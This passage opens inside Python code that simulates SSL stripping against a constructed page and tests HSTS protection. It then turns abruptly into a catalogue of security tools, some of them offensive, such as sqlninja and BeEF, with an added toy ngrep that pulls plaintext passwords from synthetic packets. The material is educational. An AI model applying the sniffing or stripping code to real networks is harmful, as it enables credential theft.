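        return False

def attack_succeeds(policy: HstsPolicy, url: str, now: float) -> bool:
    """A stripped link only helps the attacker if the browser will actually
    send it in plaintext, i.e. if HSTS does not force an upgrade."""
    m = re.match(r"http://([^/:]+)", url)
    return bool(m) and not policy.must_use_https(m.group(1), now)

# Constructed page: two HTTPS links and one that was plaintext to begin with.
SAMPLE_HTML = (
    '<a href="https://bank.example/login">Log in</a> '
    '<a href="https://shop.example/cart">Cart</a> '
    '<a href="http://news.example/">News</a>'
)

if __name__ == "__main__":
    page, mapping = strip_https(SAMPLE_HTML)
    policy = HstsPolicy()
    policy.learn("bank.example", "max-age=31536000; includeSubDomains", now=1000.0)
    for stripped in mapping:
        print(stripped, "exposed" if attack_succeeds(policy, stripped, now=2000.0) else "blocked by HSTS")
```

The checks in the test mirror what you should verify on your own sites: a long max-age, includeSubDomains so login.bank.example is covered too, and preloading so that even the very first visit is protected.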
SolarWinds
has created and sells dozens of special-purpose tools targeted at systems
administrators. Security-related tools include many network discovery scanners,
an SNMP brute-force cracker, router password decryption, a TCP connection reset
program, one of the fastest and easiest router config download/upload applications
available and more.
ngrep
strives to provide most of GNU grep's common features, applying them to the
network layer. ngrep is a pcap-aware tool that will allow you to specify
extended regular or hexadecimal expressions to match against data payloads of
packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP,
FDDI, Token Ring and null interfaces, and understands bpf filter logic in the
same fashion as more common packet sniffing tools, such as tcpdump and snoop.
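A reduced ngrep, as an added example that is not part of ngrep or of the original page: it parses the classic libpcap file format, decodes Ethernet/IPv4/TCP, and runs a regular expression over each payload the way ngrep matches against packet data. The capture is constructed inside the block (three made-up frames with checksums left at zero and TEST-NET/private addresses), so nothing real is sniffed.

```python
import re
import struct

def _frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame (checksums zero; fine for parsing demos)."""
    eth = bytes.fromhex("001122334455" "66778899aabb" "0800")
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)  # PSH|ACK
    return eth + ip + tcp + payload

def build_pcap(frames, linktype: int = 1) -> bytes:
    """Classic pcap: 24-byte global header, then (16-byte record header, frame)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(fr), len(fr)) + fr
    return out

def iter_pcap(data: bytes):
    """Yield (timestamp, frame bytes) from a classic pcap blob, either byte order."""
    magic = struct.unpack_from("<I", data, 0)[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is a different format)")
    linktype = struct.unpack_from(endian + "I", data, 20)[0]
    if linktype != 1:
        raise ValueError("only DLT_EN10MB (Ethernet) handled here")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len

def decode_tcp(frame: bytes):
    """(src, sport, dst, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != 6:                       # not TCP
        return None
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    doff = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[doff:]

def ngrep(pcap: bytes, pattern: str, flags: int = re.IGNORECASE):
    """Return [(ts, 'src:port', 'dst:port', payload)] for packets whose payload matches."""
    rx = re.compile(pattern.encode(), flags)
    hits = []
    for ts, frame in iter_pcap(pcap):
        decoded = decode_tcp(frame)
        if decoded is None:
            continue
        src, sport, dst, dport, payload = decoded
        if rx.search(payload):
            hits.append((ts, f"{src}:{sport}", f"{dst}:{dport}", payload))
    return hits

# Constructed capture: a Basic-auth HTTP request, its reply, and an FTP login.
SAMPLE_PCAP = build_pcap([
    _frame("10.0.0.5", "192.0.2.10", 40001, 80,
           b"GET /admin HTTP/1.1\r\nHost: example\r\nAuthorization: Basic YWRtaW46aHVudGVyMg==\r\n\r\n"),
    _frame("192.0.2.10", "10.0.0.5", 80, 40001, b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    _frame("10.0.0.5", "10.0.0.20", 40002, 21, b"USER anonymous\r\nPASS hunter2\r\n"),
])

if __name__ == "__main__":
    for ts, src, dst, payload in ngrep(SAMPLE_PCAP, r"PASS |Authorization: Basic"):
        print(f"{ts:.6f} {src} -> {dst} {payload!r}")
```

Matching only the TCP payload, not the headers, is what lets a pattern like `PASS ` find credentials without false hits on binary header bytes; the real tool adds a BPF pre-filter so the regex runs only on packets worth looking at.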
EtherApe
Featuring
link layer, IP, and TCP modes, EtherApe displays network activity graphically
with a color coded protocols display. Hosts and links change in size with
traffic. It supports Ethernet, WLAN, FDDI, Token Ring, ISDN, PPP and SLIP
devices. It can filter traffic to be shown, and can read traffic from a file as
well as live from the network.
Splunk
is a tool to search, report, monitor and analyze real-time streaming and
historical IT data. It collects logs from a variety of sources and makes them
searchable in a unified interface.
Angry
IP Scanner is a small open source Java application which performs host
discovery ("ping scan") and port scans. The old 2.x release was
Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as
Java is installed. Version 3.X omits the vampire zebra logo.
NetWitness
NextGen is a network security monitor. The heart of the monitor is the decoder
subsystem that records network traffic for analysis. Investigator
is a protocol analyzer meant to be run on captured traffic.
Secunia
PSI (Personal Software Inspector) is a free security tool designed to detect
vulnerable and out-dated programs and plug-ins that expose your PC to attacks.
Attacks exploiting vulnerable programs and plug-ins are rarely blocked by
traditional anti-virus programs.
Nagios
is a system and network monitoring application. It watches hosts and services
that you specify, alerting you when things go bad and when they get better.
Some of its many features include monitoring of network services (SMTP, POP3,
HTTP, NNTP, ICMP, etc.), monitoring of host resources (processor load, disk
usage, etc.), and contact notifications when service or host problems occur and
get resolved (via email, pager, or user-defined method).
Immunity
Debugger is a debugger whose design reflects the need to write exploits,
analyze malware, and reverse engineer binary files. It builds on a solid user
interface with function graphing, the industry's first heap analysis tool built
specifically for heap creation, and a large and well supported Python API for
easy extensibility.
Superscan
is a free Windows-only closed-source TCP/UDP port scanner by Foundstone (now
part of McAfee). It includes a variety of additional networking tools such as
ping, traceroute, HTTP HEAD, and whois. Some functionality has been crippled by
restrictions imposed by Microsoft in Windows XP SP2 and newer releases. This
tool is not really maintained (the latest release was in 2004).
sqlninja
exploits web applications that use Microsoft SQL Server as a database backend.
Its focus is on getting a running shell on the remote host. sqlninja doesn't
find an SQL injection in the first place, but automates the exploitation
process once one has been discovered.
Helix
is an Ubuntu live CD customized for computer forensics. Helix has been designed
very carefully to not touch the host computer in any way and
it is forensically sound. Helix will not auto mount swap space, or auto mount
any attached devices. Helix also has a special Windows autorun side for
Incident Response and Forensics.
Malwarebytes'
Anti-Malware is a malware scanner for Windows. The authors claim to use a
variety of technologies to find malware undetectable by other malware scanners.
There is a free trial with limited options and a supported full version with
the ability to run scheduled scans.
Netsparker
is a web application security scanner, with support for both detection and
exploitation of vulnerabilities. It aims to be false positive–free by only
reporting confirmed vulnerabilities after successfully exploiting or otherwise
testing them.
WebInspect
is a web application security assessment tool that helps identify known and
unknown vulnerabilities within the Web application layer. It can also help
check that a Web server is configured properly, and attempts common web attacks
such as parameter injection, cross-site scripting, directory traversal, and
more. It was produced by SPI Dynamics, which is now part of HP.
BeEF
is a browser exploitation framework. This tool will demonstrate the collecting
of zombie browsers and browser vulnerabilities in real-time. It provides a
command and control interface which facilitates the targeting of individual or
groups of zombie browsers. It is designed to make the creation of new exploit
modules easy.
Argus
is a fixed-model Real Time Flow Monitor designed to track and report on the
status and performance of all network transactions seen in a data network
traffic stream. Argus provides a common data format for reporting flow metrics
such as connectivity, capacity, demand, loss, delay, and jitter on a per
transaction basis. The record format that Argus uses is flexible and
extensible, supporting generic flow identifiers and metrics, as well as
application/protocol specific information.
PF
Like Netfilter
and ipfilter on other platforms, OpenBSD users love PF, their firewall
tool. It handles network address translation, normalizing TCP/IP traffic,
providing bandwidth control, and packet prioritization. It also offers some
eccentric features, such as passive OS detection. Coming from the same guys who
created OpenBSD, you can trust that it has been well audited and coded to avoid
the sort of security holes found in other packet filters.
ClamAV
is a powerful AntiVirus scanner focused towards integration with mail servers
for attachment scanning. It provides a flexible and scalable multi-threaded
daemon, a command line scanner, and a tool for automatic updating via the
Internet. Clam AntiVirus is based on a shared library distributed with the Clam
AntiVirus package, which you can use with your own software. Most importantly,
the virus database is kept up to date.
Nipper
(short for Network Infrastructure Parser, previously known as CiscoParse)
audits the security of network devices such as switches, routers, and
firewalls. It works by parsing and analyzing device configuration files, which
the Nipper user must supply. This was an open source tool until its developer
(Titania) released a commercial version and tried to hide their old GPL
releases.
NetworkMiner
is a Network Forensic Analysis Tool for Windows. NetworkMiner can be used as a
passive network sniffer/packet capturing tool in order to detect operating
systems, sessions, hostnames, open ports, etc. without putting any traffic on
the network. NetworkMiner can also parse pcap files for off-line analysis and
to regenerate/reassemble transmitted files and certificates from pcap files.
Wikto
is a tool that checks for flaws in webservers. It provides much the same
functionality as Nikto but adds various interesting pieces of
functionality, such as a Back-End miner and close Google integration.
Wikto is written for the MS .NET environment and registration is required to
download the binary and/or source code.
P0f
is able to identify the operating system of a target host simply by examining
captured packets even when the device in question is behind an overzealous
packet firewall. P0f does not generate ANY additional network traffic, direct or
indirect. No name lookups, no mysterious probes, no ARIN queries, nothing. In
the hands of advanced users, P0f can detect firewall presence, NAT use,
existence of load balancers, and more!
NoScript
is an add-on for Firefox that blocks JavaScript, Java, Flash, and other plugin
content (allowing you to selectively re-enable them for certain sites). It also
offers cross-site scripting protection. This is mainly designed to keep web
users safe, but security testers can also use the add-on to see what scripts a
site is using. One caution is that the NoScript author Giorgio Maone has been
caught inserting hidden code into NoScript which disabled users' ad-blocking
software so that ads would still show up on the NoScript web site.
Sguil
(pronounced sgweel) is built by network security analysts for network security
analysts. Sguil's main component is an intuitive GUI that provides access to
real-time events, session data, and raw packet captures. Sguil facilitates the
practice of Network Security Monitoring and event-driven analysis.
Samurai Web Testing Framework
is a live Linux environment that has been pre-configured to function as a web
pen-testing environment. The CD contains the best of the open source and free
tools that focus on testing and attacking websites. Samurai includes many other
tools featured in this list.
Tamper Data
is an add-on for Firefox that lets you view and modify HTTP
requests before they are sent. It shows what information the web browser is
sending on your behalf, such as cookies and hidden form fields. Use of this
plugin can reveal web applications that trust the client not to
misbehave.
Firebug
is an add-on for Firefox that provides access to browser internals.
It features live editing of HTML and CSS, a DOM viewer, and a JavaScript
debugger. Web application security testers appreciate the ability to see what's
happening behind the scenes of the browser.
inSSIDer
is a wireless network scanner for Windows, OS X, and Android. It was designed
to overcome limitations of Netstumbler, namely not working well on 64-bit
Windows and Windows Vista. inSSIDer can find open wireless access points, track
signal strength over time, and save logs with GPS records.
Nemesis
The Nemesis Project is designed to be a command line-based, portable human IP
stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol,
and should allow for useful scripting of injected packet streams from simple
shell scripts. If you enjoy Nemesis, you might also want to look at Hping as
they complement each other well.
KeePass
is a password manager. It stores many passwords which are unlocked by one
master password. The idea is to only have to remember one high-quality
password, and still be able to use unique passwords for various accounts. It
has a feature to automatically fill in passwords in web forms.
GDB
is the GNU Project's debugger. Security folks use it to analyze unknown
binaries, by getting disassemblies and stepping through a program instruction
by instruction. GDB can debug programs written in Ada, C, C++, Objective-C,
Pascal, and other languages.
VirusTotal
is a web service that analyzes submitted files for known viruses and other
malware. It incorporates dozens of antivirus engines from different vendors,
updated regularly with new signatures. Participating antivirus vendors can get
alerts when a file is not detected by their product but is by someone else's.
Tripwire
is a file and directory integrity checker. Tripwire is a tool that aids system
administrators and users in monitoring a designated set of files for any
changes. Used with system files on a regular (e.g., daily) basis, Tripwire can
notify system administrators of corrupted or tampered files, so damage control
measures can be taken in a timely manner. Traditionally an open source tool,
Tripwire Corp is now focused on their commercial enterprise configuration
control offerings.
Ratproxy
is a semi-automated, largely passive web application security audit tool. It is
meant to complement active crawlers and manual proxies more commonly used for
this task, and is optimized specifically for an accurate and sensitive
detection, and automatic annotation, of potential problems and
security-relevant design patterns based on the observation of existing,
user-initiated traffic in complex web 2.0 environments.
KisMAC
This popular wireless stumbler for Mac OS X offers many of the features of its
namesake Kismet, though the codebase is entirely different. Unlike
console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet
was ported to OS X. It also offers mapping, Pcap-format import and logging, and
even some decryption and deauthentication attacks.
ike-scan
is a command-line tool that uses the IKE protocol to discover, fingerprint and
test IPsec VPN servers. It scans IP addresses for VPN servers by sending a
specially crafted IKE packet to each host within a network. Most hosts running
IKE will respond, identifying their presence. The tool then remains silent and
monitors retransmission packets. These retransmission responses are recorded,
displayed and matched against a known set of VPN product fingerprints. ike-scan
can fingerprint VPNs from manufacturers including Checkpoint, Cisco, Microsoft,
Nortel, and Watchguard.
NetScanTools
is a collection of over 40 network utilities for Windows, designed with an easy
user interface in mind. It includes DNS tools, a ping and port scanner,
traceroute, and other utilities. It comes in bundles with more or fewer tools
based on the price.
curl
is a command line tool for transferring data with URL syntax, supporting FTP,
FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMAP,
SMTP, POP3 and RTSP. curl supports SSL certificates, HTTP POST, HTTP PUT, FTP
uploading, HTTP form based upload, proxies, cookies, authentication, and
more. libcurl provides these capabilities to other programs.
The Sleuth Kit
(previously known as TSK) is a collection of UNIX-based command line
file and volume system forensic analysis tools. The file system tools allow you
to examine file systems of a suspect computer in a non-intrusive fashion.
Because the tools do not rely on the operating system to process the file
systems, deleted and hidden content is shown. A graphical interface to the
tools called
Websecurify
is a powerful web application security testing environment designed from the
ground up to provide the best combination of automatic and manual vulnerability
testing technologies.
Knoppix
consists of a representative collection of GNU/Linux software, automatic
hardware detection, and support for many graphics cards, sound cards, SCSI and
USB devices and other peripherals. Knoppix can be used as a productive Linux
system for the desktop, educational CD, rescue system, or as many Nmap survey
takers attest, a portable security tool.
Amap
is a great tool for determining what application is listening on a given port.
Its database isn't as large as what Nmap uses for its version detection
feature, but it is definitely worth trying for a second opinion or if Nmap
fails to detect a service. Amap even knows how to parse Nmap output files.
This is yet another valuable tool from the THC.
RainbowCrack
The RainbowCrack tool is a hash cracker that makes use of a large-scale
time-memory trade-off. A traditional brute force cracker tries all possible
plaintexts one by one, which can be time consuming for complex passwords.
RainbowCrack uses a time-memory trade-off to do all the cracking-time
computation in advance and store the results in so-called "rainbow tables". It
does take a long time to precompute the tables but RainbowCrack can be hundreds
of times faster than a brute force cracker once the precomputation is finished.
Grendel-Scan
is an open-source web application security testing tool. It has an automated
testing module for detecting common web application vulnerabilities, and
features geared at aiding manual penetration tests.
dradis
is an open source framework to enable effective sharing of information among
participants in a penetration test. It is a self-contained web application that
provides a centralised repository of information to keep track of what has been
done so far, and what is still ahead. It has plugins to read and collect the
output of a variety of network scanning tools, like Nmap, Burp Suite, and Nikto.
A
utility similar to the venerable Netcat that works over a number of protocols
and through files, pipes, devices (terminal or modem, etc.), sockets (Unix,
IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It
provides forking, logging, and dumping, different modes for interprocess
communication, and many more options.
DumpSec
is a security auditing program for Microsoft Windows NT/XP/200x. It dumps the
permissions (DACLs) and audit settings (SACLs) for the file system, registry,
printers and shares in a concise, readable format, so that holes in system
security are readily apparent. DumpSec also dumps user, group and replication
information.
SAINT
is a commercial vulnerability assessment tool. Like Nessus, it used to be free
and open source but is now a commercial product. Unlike Nexpose and
QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of the few
scanner vendors that don't support (run on) Windows at all.
NBTScan
is a program for scanning IP networks for NetBIOS name information (similar to
what the Windows nbtstat tool provides against single hosts). It sends a
NetBIOS status query to each address in a supplied range and lists received
information in human readable form.
DirBuster
searches for hidden pages and directories on a web server. Sometimes developers
will leave a page accessible, but unlinked; DirBuster is meant to find these
potential vulnerabilities. This is a Java application developed by OWASP.
WinDbg
is a graphical debugger from Microsoft. It is actually just one component of
the Debugging Tools for Windows package, which also includes
the KD, CDB, and NTSD debuggers. Its claim to fame is debugging memory dumps
produced after a crash. It can even debug in kernel mode.
Wfuzz
is a tool for bruteforcing Web Applications. It can be used for finding
resources not linked (directories, servlets, scripts, etc.), bruteforcing GET
and POST parameters for different kinds of injections (SQL, XSS, LDAP, etc.),
bruteforcing form parameters (user/password), fuzzing, and more.
ArcSight
provides a suite of tools for SIEM (security information and event management).
The best-known seems to be ArcSight Enterprise Security Manager (ESM),
described as the "brain" of the SIEM platform. It is a log analyzer
and correlation engine designed to sift out important network events. The ESM
itself is a standalone appliance, and the management programs run on Linux,
Windows, AIX, and Solaris.
Unicornscan
is an attempt at a User-land Distributed TCP/IP stack for information gathering
and correlation. It is intended to provide a researcher a superior interface
for introducing a stimulus into and measuring a response from a TCP/IP enabled
device or network. Some of its features include asynchronous stateless TCP
scanning with all variations of TCP flags, asynchronous stateless TCP banner
grabbing, and active/passive remote OS, application, and component
identification by analyzing responses. Like Scanrand, it isn't for the faint of
heart.
stunnel
The stunnel program is designed to work as an SSL encryption wrapper between
remote client and local (inetd-startable) or remote servers. It can be used to
add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP
servers without any changes in the programs' code. It will negotiate an SSL
connection using the OpenSSL or SSLeay libraries.
SELinux
Security Enhanced Linux (SELinux) is a security enhancement to Linux
implementing mandatory access control (MAC). Users and processes can be granted
their least required privileges in a much more granular way than with
traditional Unix access control. For example, you can define a policy to
prevent your web browser from reading your SSH keys.
This
Windows-only cracker bangs against network services of remote systems trying to
guess passwords by using a dictionary and permutations thereof. It supports
HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more. No source code is
available. UNIX users should take a look at THC Hydra.
EnCase
is a suite of computer forensics software, commonly used by law enforcement.
Its wide use has made it a de-facto standard in forensics. It is made to
collect data from a computer in a forensically sound manner (employing
checksums to help detect tampering).
Wapiti
allows you to audit the security of your web applications. It performs "black-box"
scans; i.e., it does not study the source code of the application but
scans the webpages of the deployed webapp, looking for scripts and forms where
it can inject data. Once it gets this list, Wapiti acts like a fuzzer,
injecting payloads to see if a script is vulnerable.
WebGoat
is a deliberately insecure J2EE web application maintained by OWASP designed
to teach web application security lessons. In each lesson, users must
demonstrate their understanding of a security issue by exploiting a real
vulnerability in the WebGoat application. For example, in one of the lessons
the user must use SQL injection to steal fake credit card numbers. The application
is a realistic teaching environment, providing users with hints and code to
further explain the lesson.
HijackThis
inspects a computer's browser and operating system settings to generate a log
file of its current state. It can selectively remove unwanted settings and
files. Its main focus is on web browser hijacking. It is a freeware utility
originally written by Merijn Bellekom but now distributed by Trend Micro.
Honeyd
is a small daemon that creates virtual hosts on a network. The hosts can be
configured to run arbitrary services, and their TCP personality can be adapted
so that they appear to be running certain versions of operating systems. Honeyd
enables a single host to claim multiple addresses on a LAN for network
simulation. It is possible to ping the virtual machines, or to traceroute them.
AIDE
(Advanced Intrusion Detection Environment) is a rootkit detector, a free
replacement for Tripwire. It makes cryptographic hashes of important system files
and stores them in a database. It can then make reports about which files have
changed.